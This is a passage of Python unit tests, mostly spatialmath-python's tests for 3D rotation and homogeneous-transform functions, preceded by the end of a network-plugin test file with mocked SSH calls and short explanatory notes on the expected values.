from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import run_psmclient_cmd # pylint:disable=import-error
actual = run_psmclient_cmd(server_ip, username, password, cmd)
expect = output
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
def test_run_psmclient_not_ok(self, mock_run_ssh_cmd):
# pylint: disable=missing-docstring
output, error = b'retcode=false', b''
mock_run_ssh_cmd.return_value = output, error
server_ip = "192.168.88.169"
username = "root"
password = "d8e8fca"
cmd = ""
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import run_psmclient_cmd # pylint:disable=import-error
actual = run_psmclient_cmd(server_ip, username, password, cmd)
expect = output
self.assertEqual(actual, expect)
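Both `run_psmclient_cmd` tests return the raw byte output whether or not it contains `retcode=ok`, so the ok/not-ok distinction presumably happens in the caller. A tiny sketch of that check (the helper name is hypothetical):

```python
def parse_psmclient_output(output: bytes) -> bool:
    # hypothetical helper: psmclient is assumed to report success as "retcode=ok"
    return b"retcode=ok" in output
```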
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.socket')
def test_cidr_to_netmask(self, mock_socket):
# pylint: disable=missing-docstring
net_bits = 24
mock_socket.inet_ntoa.return_value = "255.255.255.0"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import cidr_to_netmask # pylint:disable=import-error
actual = cidr_to_netmask(net_bits)
expect = "255.255.255.0"
self.assertEqual(actual, expect)
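The expected netmask above can be reproduced with the standard bit arithmetic: a /n prefix is n one bits followed by (32 - n) zeros, packed big-endian and rendered with `socket.inet_ntoa`. A standalone reimplementation for illustration (not the plugin's code):

```python
import socket
import struct

def cidr_to_netmask_sketch(net_bits: int) -> str:
    # n one bits followed by (32 - n) zeros, as an unsigned 32-bit integer
    mask = (0xFFFFFFFF << (32 - net_bits)) & 0xFFFFFFFF
    # pack big-endian and render dotted-quad
    return socket.inet_ntoa(struct.pack(">I", mask))
```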
if __name__ == "__main__":
unittest.main()
# --- tests/base/test_transforms3d.py (repo: dbkmgm/spatialmath-python, MIT license) ---
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 10 14:19:04 2020
@author: corkep
"""
import numpy as np
import numpy.testing as nt
import unittest
from math import pi
import math
from scipy.linalg import logm, expm
from spatialmath.base.transforms3d import *
from spatialmath.base.transformsNd import isR, t2r, r2t, rt2tr
class Test3D(unittest.TestCase):
def test_checks(self):
# 2D case, with rotation matrix
R = np.eye(2)
nt.assert_equal(isR(R), True)
nt.assert_equal(isrot(R), False)
nt.assert_equal(ishom(R), False)
nt.assert_equal(isrot(R, True), False)
nt.assert_equal(ishom(R, True), False)
# 2D case, invalid rotation matrix
R = np.array([[1, 1], [0, 1]])
nt.assert_equal(isR(R), False)
nt.assert_equal(isrot(R), False)
nt.assert_equal(ishom(R), False)
nt.assert_equal(isrot(R, True), False)
nt.assert_equal(ishom(R, True), False)
# 2D case, with homogeneous transformation matrix
T = np.array([[1, 0, 3], [0, 1, 4], [0, 0, 1]])
nt.assert_equal(isR(T), False)
nt.assert_equal(isrot(T), True)
nt.assert_equal(ishom(T), False)
nt.assert_equal(isrot(T, True), False)
nt.assert_equal(ishom(T, True), False)
# 2D case, homogeneous transformation with invalid rotation submatrix
T = np.array([[1, 1, 3], [0, 1, 4], [0, 0, 1]])
nt.assert_equal(isR(T), False)
nt.assert_equal(isrot(T), True)
nt.assert_equal(ishom(T), False)
nt.assert_equal(isrot(T, True), False)
nt.assert_equal(ishom(T, True), False)
# 2D case, invalid bottom row
T = np.array([[1, 1, 3], [0, 1, 4], [9, 0, 1]])
nt.assert_equal(isR(T), False)
nt.assert_equal(isrot(T), True)
nt.assert_equal(ishom(T), False)
nt.assert_equal(isrot(T, True), False)
nt.assert_equal(ishom(T, True), False)
def test_trinv(self):
T = np.eye(4)
nt.assert_array_almost_equal(trinv(T), T)
T = trotx(0.3)
nt.assert_array_almost_equal(trinv(T) @ T, np.eye(4))
T = transl(1, 2, 3)
nt.assert_array_almost_equal(trinv(T) @ T, np.eye(4))
def test_rotx(self):
R = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
nt.assert_array_almost_equal(rotx(0), R)
nt.assert_array_almost_equal(rotx(0, unit="rad"), R)
nt.assert_array_almost_equal(rotx(0, unit="deg"), R)
nt.assert_array_almost_equal(rotx(0, "deg"), R)
nt.assert_almost_equal(np.linalg.det(rotx(0)), 1)
R = np.array([[1, 0, 0], [0, 0, -1], [0, 1, 0]])
nt.assert_array_almost_equal(rotx(pi / 2), R)
nt.assert_array_almost_equal(rotx(pi / 2, unit="rad"), R)
nt.assert_array_almost_equal(rotx(90, unit="deg"), R)
nt.assert_array_almost_equal(rotx(90, "deg"), R)
nt.assert_almost_equal(np.linalg.det(rotx(pi / 2)), 1)
R = np.array([[1, 0, 0], [0, -1, 0], [0, 0, -1]])
nt.assert_array_almost_equal(rotx(pi), R)
nt.assert_array_almost_equal(rotx(pi, unit="rad"), R)
nt.assert_array_almost_equal(rotx(180, unit="deg"), R)
nt.assert_array_almost_equal(rotx(180, "deg"), R)
nt.assert_almost_equal(np.linalg.det(rotx(pi)), 1)
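The fixtures in `test_rotx` follow the standard elementary rotation about the x axis. As a cross-check, here is a reference construction built directly from that definition:

```python
import numpy as np

def rotx_ref(theta):
    # elementary rotation about x: [[1, 0, 0], [0, c, -s], [0, s, c]]
    c, s = np.cos(theta), np.sin(theta)
    return np.array([[1, 0, 0], [0, c, -s], [0, s, c]])
```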
def test_roty(self):
R = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
nt.assert_array_almost_equal(roty(0), R)
nt.assert_array_almost_equal(roty(0, unit="rad"), R)
nt.assert_array_almost_equal(roty(0, unit="deg"), R)
nt.assert_array_almost_equal(roty(0, "deg"), R)
nt.assert_almost_equal(np.linalg.det(roty(0)), 1)
R = np.array([[0, 0, 1], [0, 1, 0], [-1, 0, 0]])
nt.assert_array_almost_equal(roty(pi / 2), R)
nt.assert_array_almost_equal(roty(pi / 2, unit="rad"), R)
nt.assert_array_almost_equal(roty(90, unit="deg"), R)
nt.assert_array_almost_equal(roty(90, "deg"), R)
nt.assert_almost_equal(np.linalg.det(roty(pi / 2)), 1)
R = np.array([[-1, 0, 0], [0, 1, 0], [0, 0, -1]])
nt.assert_array_almost_equal(roty(pi), R)
nt.assert_array_almost_equal(roty(pi, unit="rad"), R)
nt.assert_array_almost_equal(roty(180, unit="deg"), R)
nt.assert_array_almost_equal(roty(180, "deg"), R)
nt.assert_almost_equal(np.linalg.det(roty(pi)), 1)
def test_rotz(self):
R = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
nt.assert_array_almost_equal(rotz(0), R)
nt.assert_array_almost_equal(rotz(0, unit="rad"), R)
nt.assert_array_almost_equal(rotz(0, unit="deg"), R)
nt.assert_array_almost_equal(rotz(0, "deg"), R)
nt.assert_almost_equal(np.linalg.det(rotz(0)), 1)
R = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 1]])
nt.assert_array_almost_equal(rotz(pi / 2), R)
nt.assert_array_almost_equal(rotz(pi / 2, unit="rad"), R)
nt.assert_array_almost_equal(rotz(90, unit="deg"), R)
nt.assert_array_almost_equal(rotz(90, "deg"), R)
nt.assert_almost_equal(np.linalg.det(rotz(pi / 2)), 1)
R = np.array([[-1, 0, 0], [0, -1, 0], [0, 0, 1]])
nt.assert_array_almost_equal(rotz(pi), R)
nt.assert_array_almost_equal(rotz(pi, unit="rad"), R)
nt.assert_array_almost_equal(rotz(180, unit="deg"), R)
nt.assert_array_almost_equal(rotz(180, "deg"), R)
nt.assert_almost_equal(np.linalg.det(rotz(pi)), 1)
def test_trotX(self):
T = np.array([[1, 0, 0, 3], [0, 0, -1, 4], [0, 1, 0, 5], [0, 0, 0, 1]])
nt.assert_array_almost_equal(trotx(pi / 2, t=[3, 4, 5]), T)
nt.assert_array_almost_equal(trotx(pi / 2, t=(3, 4, 5)), T)
nt.assert_array_almost_equal(trotx(pi / 2, t=np.array([3, 4, 5])), T)
T = np.array([[0, 0, 1, 3], [0, 1, 0, 4], [-1, 0, 0, 5], [0, 0, 0, 1]])
nt.assert_array_almost_equal(troty(pi / 2, t=[3, 4, 5]), T)
nt.assert_array_almost_equal(troty(pi / 2, t=(3, 4, 5)), T)
nt.assert_array_almost_equal(troty(pi / 2, t=np.array([3, 4, 5])), T)
T = np.array([[0, -1, 0, 3], [1, 0, 0, 4], [0, 0, 1, 5], [0, 0, 0, 1]])
nt.assert_array_almost_equal(trotz(pi / 2, t=[3, 4, 5]), T)
nt.assert_array_almost_equal(trotz(pi / 2, t=(3, 4, 5)), T)
nt.assert_array_almost_equal(trotz(pi / 2, t=np.array([3, 4, 5])), T)
def test_rpy2r(self):
r2d = 180 / pi
# default zyx order
R = rotz(0.3) @ roty(0.2) @ rotx(0.1)
nt.assert_array_almost_equal(rpy2r(0.1, 0.2, 0.3), R)
nt.assert_array_almost_equal(rpy2r([0.1, 0.2, 0.3]), R)
nt.assert_array_almost_equal(
rpy2r(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg"), R
)
nt.assert_array_almost_equal(
rpy2r([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg"), R
)
# xyz order
R = rotx(0.3) @ roty(0.2) @ rotz(0.1)
nt.assert_array_almost_equal(rpy2r(0.1, 0.2, 0.3, order="xyz"), R)
nt.assert_array_almost_equal(rpy2r([0.1, 0.2, 0.3], order="xyz"), R)
nt.assert_array_almost_equal(
rpy2r(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg", order="xyz"), R
)
nt.assert_array_almost_equal(
rpy2r([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg", order="xyz"), R
)
# yxz order
R = roty(0.3) @ rotx(0.2) @ rotz(0.1)
nt.assert_array_almost_equal(rpy2r(0.1, 0.2, 0.3, order="yxz"), R)
nt.assert_array_almost_equal(rpy2r([0.1, 0.2, 0.3], order="yxz"), R)
nt.assert_array_almost_equal(
rpy2r(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg", order="yxz"), R
)
nt.assert_array_almost_equal(
rpy2r([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg", order="yxz"), R
)
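The assertions above encode the argument convention: for the default `order="zyx"`, `rpy2r` takes `(roll, pitch, yaw)` and composes as `Rz(yaw) @ Ry(pitch) @ Rx(roll)`. A standalone restatement using reference elementary rotations:

```python
import numpy as np

def _rx(t):
    c, s = np.cos(t), np.sin(t)
    return np.array([[1, 0, 0], [0, c, -s], [0, s, c]])

def _ry(t):
    c, s = np.cos(t), np.sin(t)
    return np.array([[c, 0, s], [0, 1, 0], [-s, 0, c]])

def _rz(t):
    c, s = np.cos(t), np.sin(t)
    return np.array([[c, -s, 0], [s, c, 0], [0, 0, 1]])

def rpy2r_zyx(roll, pitch, yaw):
    # zyx order: yaw about z, then pitch about y, then roll about x
    return _rz(yaw) @ _ry(pitch) @ _rx(roll)
```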
def test_rpy2tr(self):
r2d = 180 / pi
# default zyx order
T = trotz(0.3) @ troty(0.2) @ trotx(0.1)
nt.assert_array_almost_equal(rpy2tr(0.1, 0.2, 0.3), T)
nt.assert_array_almost_equal(rpy2tr([0.1, 0.2, 0.3]), T)
nt.assert_array_almost_equal(
rpy2tr(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg"), T
)
nt.assert_array_almost_equal(
rpy2tr([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg"), T
)
# xyz order
T = trotx(0.3) @ troty(0.2) @ trotz(0.1)
nt.assert_array_almost_equal(rpy2tr(0.1, 0.2, 0.3, order="xyz"), T)
nt.assert_array_almost_equal(rpy2tr([0.1, 0.2, 0.3], order="xyz"), T)
nt.assert_array_almost_equal(
rpy2tr(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg", order="xyz"), T
)
nt.assert_array_almost_equal(
rpy2tr([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg", order="xyz"), T
)
# yxz order
T = troty(0.3) @ trotx(0.2) @ trotz(0.1)
nt.assert_array_almost_equal(rpy2tr(0.1, 0.2, 0.3, order="yxz"), T)
nt.assert_array_almost_equal(rpy2tr([0.1, 0.2, 0.3], order="yxz"), T)
nt.assert_array_almost_equal(
rpy2tr(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg", order="yxz"), T
)
nt.assert_array_almost_equal(
rpy2tr([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg", order="yxz"), T
)
def test_eul2r(self):
r2d = 180 / pi
# default zyx order
R = rotz(0.1) @ roty(0.2) @ rotz(0.3)
nt.assert_array_almost_equal(eul2r(0.1, 0.2, 0.3), R)
nt.assert_array_almost_equal(eul2r([0.1, 0.2, 0.3]), R)
nt.assert_array_almost_equal(
eul2r(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg"), R
)
nt.assert_array_almost_equal(
eul2r([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg"), R
)
def test_eul2tr(self):
r2d = 180 / pi
# default zyx order
T = trotz(0.1) @ troty(0.2) @ trotz(0.3)
nt.assert_array_almost_equal(eul2tr(0.1, 0.2, 0.3), T)
nt.assert_array_almost_equal(eul2tr([0.1, 0.2, 0.3]), T)
nt.assert_array_almost_equal(
eul2tr(0.1 * r2d, 0.2 * r2d, 0.3 * r2d, unit="deg"), T
)
nt.assert_array_almost_equal(
eul2tr([0.1 * r2d, 0.2 * r2d, 0.3 * r2d], unit="deg"), T
)
def test_angvec2r(self):
r2d = 180 / pi
nt.assert_array_almost_equal(angvec2r(0, [1, 0, 0]), rotx(0))
nt.assert_array_almost_equal(angvec2r(pi / 4, [1, 0, 0]), rotx(pi / 4))
nt.assert_array_almost_equal(angvec2r(-pi / 4, [1, 0, 0]), rotx(-pi / 4))
nt.assert_array_almost_equal(angvec2r(0, [0, 1, 0]), roty(0))
nt.assert_array_almost_equal(angvec2r(pi / 4, [0, 1, 0]), roty(pi / 4))
nt.assert_array_almost_equal(angvec2r(-pi / 4, [0, 1, 0]), roty(-pi / 4))
nt.assert_array_almost_equal(angvec2r(0, [0, 0, 1]), rotz(0))
nt.assert_array_almost_equal(angvec2r(pi / 4, [0, 0, 1]), rotz(pi / 4))
nt.assert_array_almost_equal(angvec2r(-pi / 4, [0, 0, 1]), rotz(-pi / 4))
def test_angvec2tr(self):
r2d = 180 / pi
nt.assert_array_almost_equal(angvec2tr(0, [1, 0, 0]), trotx(0))
nt.assert_array_almost_equal(angvec2tr(pi / 4, [1, 0, 0]), trotx(pi / 4))
nt.assert_array_almost_equal(angvec2tr(-pi / 4, [1, 0, 0]), trotx(-pi / 4))
nt.assert_array_almost_equal(angvec2tr(0, [0, 1, 0]), troty(0))
nt.assert_array_almost_equal(angvec2tr(pi / 4, [0, 1, 0]), troty(pi / 4))
nt.assert_array_almost_equal(angvec2tr(-pi / 4, [0, 1, 0]), troty(-pi / 4))
nt.assert_array_almost_equal(angvec2tr(0, [0, 0, 1]), trotz(0))
nt.assert_array_almost_equal(angvec2tr(pi / 4, [0, 0, 1]), trotz(pi / 4))
nt.assert_array_almost_equal(angvec2tr(-pi / 4, [0, 0, 1]), trotz(-pi / 4))
def test_exp2r(self):
r2d = 180 / pi
nt.assert_array_almost_equal(exp2r([0, 0, 0]), rotx(0))
nt.assert_array_almost_equal(exp2r([pi / 4, 0, 0]), rotx(pi / 4))
nt.assert_array_almost_equal(exp2r([-pi / 4, 0, 0]), rotx(-pi / 4))
nt.assert_array_almost_equal(exp2r([0, 0, 0]), roty(0))
nt.assert_array_almost_equal(exp2r([0, pi / 4, 0]), roty(pi / 4))
nt.assert_array_almost_equal(exp2r([0, -pi / 4, 0]), roty(-pi / 4))
nt.assert_array_almost_equal(exp2r([0, 0, 0]), rotz(0))
nt.assert_array_almost_equal(exp2r([0, 0, pi / 4]), rotz(pi / 4))
nt.assert_array_almost_equal(exp2r([0, 0, -pi / 4]), rotz(-pi / 4))
def test_exp2tr(self):
r2d = 180 / pi
nt.assert_array_almost_equal(exp2tr([0, 0, 0]), trotx(0))
nt.assert_array_almost_equal(exp2tr([pi / 4, 0, 0]), trotx(pi / 4))
nt.assert_array_almost_equal(exp2tr([-pi / 4, 0, 0]), trotx(-pi / 4))
nt.assert_array_almost_equal(exp2tr([0, 0, 0]), troty(0))
nt.assert_array_almost_equal(exp2tr([0, pi / 4, 0]), troty(pi / 4))
nt.assert_array_almost_equal(exp2tr([0, -pi / 4, 0]), troty(-pi / 4))
nt.assert_array_almost_equal(exp2tr([0, 0, 0]), trotz(0))
nt.assert_array_almost_equal(exp2tr([0, 0, pi / 4]), trotz(pi / 4))
nt.assert_array_almost_equal(exp2tr([0, 0, -pi / 4]), trotz(-pi / 4))
def test_tr2rpy(self):
rpy = np.r_[0.1, 0.2, 0.3]
R = rpy2r(rpy)
nt.assert_array_almost_equal(tr2rpy(R), rpy)
nt.assert_array_almost_equal(tr2rpy(R, unit="deg"), rpy * 180 / pi)
T = rpy2tr(rpy)
nt.assert_array_almost_equal(
tr2rpy(T),
rpy,
)
nt.assert_array_almost_equal(tr2rpy(T, unit="deg"), rpy * 180 / pi)
# xyz order
R = rpy2r(rpy, order="xyz")
nt.assert_array_almost_equal(tr2rpy(R, order="xyz"), rpy)
nt.assert_array_almost_equal(tr2rpy(R, unit="deg", order="xyz"), rpy * 180 / pi)
T = rpy2tr(rpy, order="xyz")
nt.assert_array_almost_equal(tr2rpy(T, order="xyz"), rpy)
nt.assert_array_almost_equal(tr2rpy(T, unit="deg", order="xyz"), rpy * 180 / pi)
# corner cases
seq = "zyx"
ang = [pi, 0, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, pi, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, 0, pi]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, pi / 2, 0] # singularity
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, -pi / 2, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
seq = "xyz"
ang = [pi, 0, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, pi, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, 0, pi]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, pi / 2, 0] # singularity
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, -pi / 2, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
seq = "yxz"
ang = [pi, 0, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, pi, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, 0, pi]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, pi / 2, 0] # singularity
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
ang = [0, -pi / 2, 0]
a = rpy2tr(ang, order=seq)
nt.assert_array_almost_equal(rpy2tr(tr2rpy(a, order=seq), order=seq), a)
def test_tr2eul(self):
eul = np.r_[0.1, 0.2, 0.3]
R = eul2r(eul)
nt.assert_array_almost_equal(tr2eul(R), eul)
nt.assert_array_almost_equal(tr2eul(R, unit="deg"), eul * 180 / pi)
T = eul2tr(eul)
nt.assert_array_almost_equal(tr2eul(T), eul)
nt.assert_array_almost_equal(tr2eul(T, unit="deg"), eul * 180 / pi)
# test singularity case
eul = [0.1, 0, 0.3]
R = eul2r(eul)
nt.assert_array_almost_equal(eul2r(tr2eul(R)), R)
nt.assert_array_almost_equal(eul2r(tr2eul(R, unit="deg"), unit="deg"), R)
# test flip
eul = [-0.1, 0.2, 0.3]
R = eul2r(eul)
eul2 = tr2eul(R, flip=True)
nt.assert_equal(eul2[0] > 0, True)
nt.assert_array_almost_equal(eul2r(eul2), R)
def test_tr2angvec(self):
# null rotation
# - the axis is undefined for a null rotation, but RTB returns (0, 0, 0)
[theta, v] = tr2angvec(np.eye(3, 3))
nt.assert_array_almost_equal(theta, 0.0)
nt.assert_array_almost_equal(v, np.r_[0, 0, 0])
# canonic rotations
[theta, v] = tr2angvec(rotx(pi / 2))
nt.assert_array_almost_equal(theta, pi / 2)
nt.assert_array_almost_equal(v, np.r_[1, 0, 0])
[theta, v] = tr2angvec(roty(pi / 2))
nt.assert_array_almost_equal(theta, pi / 2)
nt.assert_array_almost_equal(v, np.r_[0, 1, 0])
[theta, v] = tr2angvec(rotz(pi / 2))
nt.assert_array_almost_equal(theta, pi / 2)
nt.assert_array_almost_equal(v, np.r_[0, 0, 1])
# null rotation
[theta, v] = tr2angvec(np.eye(4))
nt.assert_array_almost_equal(theta, 0.0)
nt.assert_array_almost_equal(v, np.r_[0, 0, 0])
# canonic rotations
[theta, v] = tr2angvec(trotx(pi / 2))
nt.assert_array_almost_equal(theta, pi / 2)
nt.assert_array_almost_equal(v, np.r_[1, 0, 0])
[theta, v] = tr2angvec(troty(pi / 2))
nt.assert_array_almost_equal(theta, pi / 2)
nt.assert_array_almost_equal(v, np.r_[0, 1, 0])
[theta, v] = tr2angvec(trotz(pi / 2))
nt.assert_array_almost_equal(theta, pi / 2)
nt.assert_array_almost_equal(v, np.r_[0, 0, 1])
[theta, v] = tr2angvec(roty(pi / 2), unit="deg")
nt.assert_array_almost_equal(theta, 90)
nt.assert_array_almost_equal(v, np.r_[0, 1, 0])
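The angle/axis pairs asserted above follow the standard extraction from a rotation matrix: `theta = arccos((trace(R) - 1) / 2)`, with the axis read off the skew-symmetric part `(R - R.T) / (2 sin theta)`. A minimal sketch (deliberately without the theta-near-0 or theta-near-pi handling that `tr2angvec` itself provides):

```python
import numpy as np

def tr2angvec_sketch(R):
    # rotation angle from the trace
    theta = np.arccos((np.trace(R) - 1.0) / 2.0)
    # axis from the skew-symmetric part of R (valid away from 0 and pi)
    w = np.array([R[2, 1] - R[1, 2], R[0, 2] - R[2, 0], R[1, 0] - R[0, 1]])
    return theta, w / (2.0 * np.sin(theta))
```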
def test_print(self):
R = rotx(0.3) @ roty(0.4)
s = trprint(R, file=None)
self.assertIsInstance(s, str)
self.assertEqual(len(s), 30)
T = transl(1, 2, 3) @ trotx(0.3) @ troty(0.4)
s = trprint(T, file=None)
self.assertIsInstance(s, str)
self.assertEqual(len(s), 42)
self.assertTrue("rpy" in s)
self.assertTrue("zyx" in s)
s = trprint(T, file=None, orient="rpy/xyz")
self.assertIsInstance(s, str)
self.assertEqual(len(s), 39)
self.assertTrue("rpy" in s)
self.assertTrue("xyz" in s)
s = trprint(T, file=None, orient="eul")
self.assertIsInstance(s, str)
self.assertEqual(len(s), 37)
self.assertTrue("eul" in s)
self.assertFalse("zyx" in s)
def test_trinterp(self):
T0 = trotx(-0.3)
T1 = trotx(0.3)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0), T0)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=1), T1)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0.5), np.eye(4))
T0 = transl(-1, -2, -3)
T1 = transl(1, 2, 3)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0), T0)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=1), T1)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0.5), np.eye(4))
T0 = transl(-1, -2, -3) @ trotx(-0.3)
T1 = transl(1, 2, 3) @ trotx(0.3)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0), T0)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=1), T1)
nt.assert_array_almost_equal(trinterp(start=T0, end=T1, s=0.5), np.eye(4))
def test_tr2delta(self):
# unit testing tr2delta with a tr matrix
nt.assert_array_almost_equal(
tr2delta(transl(0.1, 0.2, 0.3)), np.r_[0.1, 0.2, 0.3, 0, 0, 0]
)
nt.assert_array_almost_equal(
tr2delta(transl(0.1, 0.2, 0.3), transl(0.2, 0.4, 0.6)),
np.r_[0.1, 0.2, 0.3, 0, 0, 0],
)
nt.assert_array_almost_equal(
tr2delta(trotx(0.001)), np.r_[0, 0, 0, 0.001, 0, 0]
)
nt.assert_array_almost_equal(
tr2delta(troty(0.001)), np.r_[0, 0, 0, 0, 0.001, 0]
)
nt.assert_array_almost_equal(
tr2delta(trotz(0.001)), np.r_[0, 0, 0, 0, 0, 0.001]
)
nt.assert_array_almost_equal(
tr2delta(trotx(0.001), trotx(0.002)), np.r_[0, 0, 0, 0.001, 0, 0]
)
# %Testing with a scalar number input
# verifyError(tc, @()tr2delta(1),'SMTB:tr2delta:badarg');
# verifyError(tc, @()tr2delta( ones(3,3) ),'SMTB:tr2delta:badarg');
def test_delta2tr(self):
# test with standard numbers
nt.assert_array_almost_equal(
delta2tr([0.1, 0.2, 0.3, 0.4, 0.5, 0.6]),
np.array(
[
[1.0, -0.6, 0.5, 0.1],
[0.6, 1.0, -0.4, 0.2],
[-0.5, 0.4, 1.0, 0.3],
[0, 0, 0, 1.0],
]
),
)
# test with zeros
nt.assert_array_almost_equal(delta2tr([0, 0, 0, 0, 0, 0]), np.eye(4))
# test with scalar input
# verifyError(testCase, @()delta2tr(1),'MATLAB:badsubscript');
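The expected matrix in `test_delta2tr` is `eye(4)` plus the augmented skew of the delta: the translational part `(tx, ty, tz)` fills the last column and the rotational part `(dx, dy, dz)` fills a 3x3 skew-symmetric block. A standalone restatement:

```python
import numpy as np

def delta2tr_sketch(d):
    tx, ty, tz, dx, dy, dz = d
    T = np.eye(4)
    # add the skew-symmetric matrix of (dx, dy, dz) to the rotation block
    T[:3, :3] += np.array([[0, -dz, dy], [dz, 0, -dx], [-dy, dx, 0]])
    T[:3, 3] = [tx, ty, tz]
    return T
```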
def test_tr2jac(self):
# NOTE: these matrices were created using pyprint() in MATLAB
# TODO change to forming it from block R matrices directly
nt.assert_array_almost_equal(
tr2jac(trotx(pi / 2)).T,
np.array(
[
[1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, -1, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, -1, 0],
]
),
)
nt.assert_array_almost_equal(
tr2jac(transl(1, 2, 3)).T,
np.array(
[
[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1],
]
),
)
# test with scalar value
# verifyError(tc, @()tr2jac(1),'SMTB:t2r:badarg');
def test_r2x(self):
R = rpy2r(0.2, 0.3, 0.4)
nt.assert_array_almost_equal(r2x(R, representation="eul"), tr2eul(R))
nt.assert_array_almost_equal(r2x(R, representation="rpy/xyz"), tr2rpy(R, order="xyz"))
nt.assert_array_almost_equal(r2x(R, representation="rpy/zyx"), tr2rpy(R, order="zyx"))
nt.assert_array_almost_equal(r2x(R, representation="rpy/yxz"), tr2rpy(R, order="yxz"))
nt.assert_array_almost_equal(r2x(R, representation="arm"), tr2rpy(R, order="xyz"))
nt.assert_array_almost_equal(r2x(R, representation="vehicle"), tr2rpy(R, order="zyx"))
nt.assert_array_almost_equal(r2x(R, representation="camera"), tr2rpy(R, order="yxz"))
nt.assert_array_almost_equal(r2x(R, representation="exp"), trlog(R, twist=True))
def test_x2r(self):
x = [0.2, 0.3, 0.4]
nt.assert_array_almost_equal(x2r(x, representation="eul"), eul2r(x))
nt.assert_array_almost_equal(x2r(x, representation="rpy/xyz"), rpy2r(x, order="xyz"))
nt.assert_array_almost_equal(x2r(x, representation="rpy/zyx"), rpy2r(x, order="zyx"))
nt.assert_array_almost_equal(x2r(x, representation="rpy/yxz"), rpy2r(x, order="yxz"))
nt.assert_array_almost_equal(x2r(x, representation="arm"), rpy2r(x, order="xyz"))
nt.assert_array_almost_equal(x2r(x, representation="vehicle"), rpy2r(x, order="zyx"))
nt.assert_array_almost_equal(x2r(x, representation="camera"), rpy2r(x, order="yxz"))
nt.assert_array_almost_equal(x2r(x, representation="exp"), trexp(x))
def test_tr2x(self):
t = [1, 2, 3]
R = rpy2tr(0.2, 0.3, 0.4)
T = transl(t) @ R
x = tr2x(T, representation="eul")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2eul(R))
x = tr2x(T, representation="rpy/xyz")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2rpy(R, order="xyz"))
x = tr2x(T, representation="rpy/zyx")
nt.assert_array_almost_equal(x[:3], t)
nt.assert_array_almost_equal(x[3:], tr2rpy(R, order="zyx"))
x = tr2x(T, representation="rpy/yxz")
nt.assert_array_almost_equal(x[:3], t)
